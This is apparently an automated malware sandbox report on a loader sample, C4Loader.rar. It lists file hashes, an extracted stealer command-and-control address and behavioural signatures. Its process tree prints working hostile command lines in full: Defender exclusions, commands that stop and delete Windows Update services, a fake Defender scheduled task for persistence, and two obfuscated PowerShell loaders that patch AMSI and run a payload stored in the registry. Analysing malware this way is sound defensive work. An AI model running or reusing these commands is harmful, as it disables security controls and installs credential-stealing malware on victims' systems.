Analysis
- max time kernel: 168s
- max time network: 183s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10-03-2023 19:16
- Static task: static1
- Behavioral task: behavioral1
- Sample: C4Loader.rar
- Resource: win7-20230220-en

General
- Target: C4Loader.rar
- Size: 130KB
- MD5: 931ddbdafed0212e3b1da2460907950c
- SHA1: 57d23f7f836befc775cc3f790115b65a503d158a
- SHA256: c4d92f2b4fe82c7eca69558a5e62e270e0486ce0fcffe51aa72ed2ed104cb7e8
- SHA512: a8e9cf280ebf4070f3d7133c9eb63929da81e98de8fc2be0b90e0d1e58204406b4cbe7b6a92a99e5417434d39f3fc2b791bc4a749989d0c4955f6346cf5f8c4d
- SSDEEP: 3072:krhy/OohnJqAvej6Svh6m2aBg6gwFTbFwLyTh2ShCCpqC:ihMhnUj6SMyBg6gwH80hI4

Malware Config
- Extracted: aurora
  - 107.182.129.73:8081
Signatures

Modifies security service (2 TTPs, 5 IoCs)
Processes:
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security

Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Processes:
- PID 1120 SmartDefRun.exe created PID 2676 Explorer.EXE (4 events)

Blocklisted process makes network request (1 IoCs)
Processes:
- flow 79: PID 2412 powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory (1 IoCs)
Processes:
- SmartDefRun.exe: File created C:\Windows\System32\drivers\etc\hosts

Stops running service(s) (3 TTPs)

Executes dropped EXE (5 IoCs)
Processes:
- 2368 C4Loader.exe
- 432 C4Loader.exe
- 1128 new2.exe
- 3748 SysApp.exe
- 1120 SmartDefRun.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Suspicious use of SetThreadContext (2 IoCs)
Processes:
- PID 2368 C4Loader.exe set thread context of PID 3208 RegSvcs.exe
- PID 1120 SmartDefRun.exe set thread context of PID 2696 dialer.exe

Drops file in Program Files directory (1 IoCs)
Processes:
- SmartDefRun.exe: File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe

Launches sc.exe (5 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes:
- 4128 sc.exe
- 716 sc.exe
- 4200 sc.exe
- 1492 sc.exe
- 748 sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)
Processes:
- 4652 WerFault.exe (target: PID 2368 C4Loader.exe)
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
Suspicious behavior: EnumeratesProcesses (28 IoCs)
Processes:
- 2412 powershell.exe (2 events)
- 3748 SysApp.exe (10 events)
- 1120 SmartDefRun.exe (8 events)
- 3668 powershell.exe (2 events)
- 1144 powershell.exe (2 events)
- 3572 powershell.EXE (2 events)
- 60 powershell.EXE (2 events)

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
Processes:
- 4440 OpenWith.exe
- 3432 7zFM.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
- 3432 7zFM.exe: SeRestorePrivilege, 35, SeSecurityPrivilege
- 2412 powershell.exe: SeDebugPrivilege
- 4340 wmic.exe (each token seen twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 4652 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
- 3432 7zFM.exe (2 events)

Suspicious use of SetWindowsHookEx (26 IoCs)
Processes:
- 4440 OpenWith.exe (26 events)

Suspicious use of WriteProcessMemory (51 IoCs)
Processes:
- PID 4440 OpenWith.exe wrote to memory of PID 3432 7zFM.exe (2 events)
- PID 2368 C4Loader.exe wrote to memory of PID 3208 RegSvcs.exe (5 events)
- PID 3208 RegSvcs.exe wrote to memory of PID 2412 powershell.exe (3 events)
- PID 2412 powershell.exe wrote to memory of PID 432 C4Loader.exe (3 events)
- PID 2412 powershell.exe wrote to memory of PID 1128 new2.exe (2 events)
- PID 2412 powershell.exe wrote to memory of PID 3748 SysApp.exe (3 events)
- PID 2412 powershell.exe wrote to memory of PID 1120 SmartDefRun.exe (2 events)
- PID 1128 new2.exe wrote to memory of PID 4340 wmic.exe (2 events)
- PID 1128 new2.exe wrote to memory of PID 4080 cmd.exe (2 events)
- PID 4080 cmd.exe wrote to memory of PID 4652 WMIC.exe (2 events)
- PID 1128 new2.exe wrote to memory of PID 1632 cmd.exe (2 events)
- PID 1632 cmd.exe wrote to memory of PID 2096 WMIC.exe (2 events)
- PID 4616 cmd.exe wrote to memory of sc.exe PIDs 4128, 716, 4200, 1492, 748 (2 events each)
- PID 4616 cmd.exe wrote to memory of reg.exe PIDs 3332, 2080, 3328, 2848, 1148 (2 events each)
- PID 1120 SmartDefRun.exe wrote to memory of PID 2696 dialer.exe (1 event)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXE
Command line
C:\Windows\Explorer.EXE
Depth
1
-
C:\Windows\system32\cmd.exe
Command line
cmd /c C:\Users\Admin\AppData\Local\Temp\C4Loader.rar
Depth
2
- Modifies registry class
-
C:\Users\Admin\Desktop\C4Loader.exe
Command line
"C:\Users\Admin\Desktop\C4Loader.exe"
Depth
2
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Command line
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Depth
3
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
Depth
4
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Command line
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
Depth
5
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe
Command line
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
Depth
5
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe
Command line
wmic os get Caption
Depth
6
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe
Command line
cmd /C "wmic path win32_VideoController get name"
Depth
6
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe
Command line
wmic path win32_VideoController get name
Depth
7
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe
Command line
cmd /C "wmic cpu get name"
Depth
6
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe
Command line
wmic cpu get name
Depth
7
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Command line
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
Depth
5
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Command line
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
Depth
5
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe
Command line
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 276
Depth
3
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Depth
2
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe
Command line
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Depth
2
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exe
Command line
sc stop UsoSvc
Depth
3
- Launches sc.exe
-
C:\Windows\System32\sc.exe
Command line
sc stop WaaSMedicSvc
Depth
3
- Launches sc.exe
-
C:\Windows\System32\sc.exe
Command line
sc stop wuauserv
Depth
3
- Launches sc.exe
-
C:\Windows\System32\sc.exe
Command line
sc stop bits
Depth
3
- Launches sc.exe
-
C:\Windows\System32\sc.exe
Command line
sc stop dosvc
Depth
3
- Launches sc.exe
-
C:\Windows\System32\reg.exe
Command line
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Depth
3
-
C:\Windows\System32\reg.exe
Command line
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Depth
3
-
C:\Windows\System32\reg.exe
Command line
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Depth
3
- Modifies security service
-
C:\Windows\System32\reg.exe
Command line
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Depth
3
-
C:\Windows\System32\reg.exe
Command line
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Depth
3
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
Depth
2
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exe
Command line
C:\Windows\System32\dialer.exe
Depth
2
-
C:\Windows\system32\OpenWith.exe
Command line
C:\Windows\system32\OpenWith.exe -Embedding
Depth
1
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe
Command line
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\C4Loader.rar"
Depth
2
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exe
Command line
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2368 -ip 2368
Depth
1
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
Command line
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:pICYGROwCRXF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZdxPjQyPfYYyVD,[Parameter(Position=1)][Type]$SesavlMLMI)$QEEQdaLBlpU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QEEQdaLBlpU.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+','+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$QEEQdaLBlpU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+'r'+[Char](116)+''+'u'+'a'+'l'+'',$SesavlMLMI,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $QEEQdaLBlpU.CreateType();}$cxRaBWSPpMDkU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'c'+''+[Char](120)+''+'R'+''+[Char](97)+''+'B'+'W'+[Char](83)+''+[Char](80)+'pMD'+'k'+''+[Char](85)+'');$rtNPooQaPbkcFs=$cxRaBWSPpMDkU.GetMethod(''+[Char](114)+''+'t'+'N'+[Char](80)+'oo'+'Q'+''+[Char](97)+'P'+[Char](98)+''+[Char](107)+''+[Char](99)+''+'F'+''+[Char](115)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SHklVYAZjDGGBodnkCk=pICYGROwCRXF @([String])([IntPtr]);$XrpSHMKYXyxTQgBIFVvqTe=pICYGROwCRXF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IxDkTDmIiUi=$cxRaBWSPpMDkU.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+'2'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$kQZvEzPRPfGcaz=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+[Char](76)+'oa'+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$THqHVJknzLzQAPEUb=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$fRxIkkm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kQZvEzPRPfGcaz,$SHklVYAZjDGGBodnkCk).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.d'+[Char](108)+'l');$tnErEZoMvwDawuSoX=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$fRxIkkm,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fNdVmVWadv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,4,[ref]$fNdVmVWadv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tnErEZoMvwDawuSoX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,0x20,[ref]$fNdVmVWadv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+'E').GetValue(''+'d'+''+[Char](105)+'ale'+'r'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
Depth
1
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Command line
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TjDgzZKfBzwu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lKEaQBCfKajnZW,[Parameter(Position=1)][Type]$tYyjqdaeOz)$CiGPUhnWVIn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+'ed'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+',Se'+'a'+'le'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'ut'+'o'+'C'+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$CiGPUhnWVIn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+''+','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lKEaQBCfKajnZW).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$CiGPUhnWVIn.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Publ'+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+'o'+'t'+','+'V'+'i'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$tYyjqdaeOz,$lKEaQBCfKajnZW).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $CiGPUhnWVIn.CreateType();}$MwBchzsQZJOZn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+'3'+[Char](50)+''+'.'+'U'+[Char](110)+'s'+[Char](97)+'fe'+[Char](77)+''+[Char](119)+''+[Char](66)+''+'c'+''+[Char](104)+''+'z'+''+[Char](115)+''+[Char](81)+''+[Char](90)+'J'+'O'+''+[Char](90)+''+'n'+'');$JHYrFqSKiGCkbg=$MwBchzsQZJOZn.GetMethod(''+[Char](74)+'HY'+[Char](114)+''+'F'+''+[Char](113)+''+[Char](83)+'Ki'+[Char](71)+''+[Char](67)+'kbg',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hPwTQzyZHTUemWpXfpr=TjDgzZKfBzwu @([String])([IntPtr]);$TsFQsekblSBnRuFOhrywDr=TjDgzZKfBzwu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AAtWwKYCpza=$MwBchzsQZJOZn.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+'d'+'le').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+''+'l'+''+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$bcTYqBfQqPuDDJ=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$mOVKLcrQlQOhzWsAv=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'ot'+[Char](101)+''+'c'+''+[Char](116)+'')));$gzFEkOI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bcTYqBfQqPuDDJ,$hPwTQzyZHTUemWpXfpr).Invoke('ams'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$BWLqHLYKEseKIOEOA=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$gzFEkOI,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$cRcvilIHtI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,4,[ref]$cRcvilIHtI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BWLqHLYKEseKIOEOA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,0x20,[ref]$cRcvilIHtI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFTW'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'le'+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
Depth
1
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dllhost.exe
Command line
C:\Windows\System32\dllhost.exe /Processid:{fcf0e698-f5b9-4a35-8f7c-433f51a62e26}
Depth
1
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB
MD5
bdb25c22d14ec917e30faf353826c5de
SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
28KB
MD5
39924b7dcecec33d208224b7df8e78f0
SHA1
12d9189b6bf68e9ffd8e393a5ab7a66fd9c02db5
SHA256
bdb86940389898e4feebf16c139b864aad8b1135838df6bb8c23d4871bab1d69
SHA512
dfd3e4681b9bc07d8a6e5a7deb0641b738edf96e78c14cf60ca3052f260c9c47cd1ee7c8ad2cd973de026e5cb5d5eb00bd14a4eeab3c6e629d275056c66f2bee
-
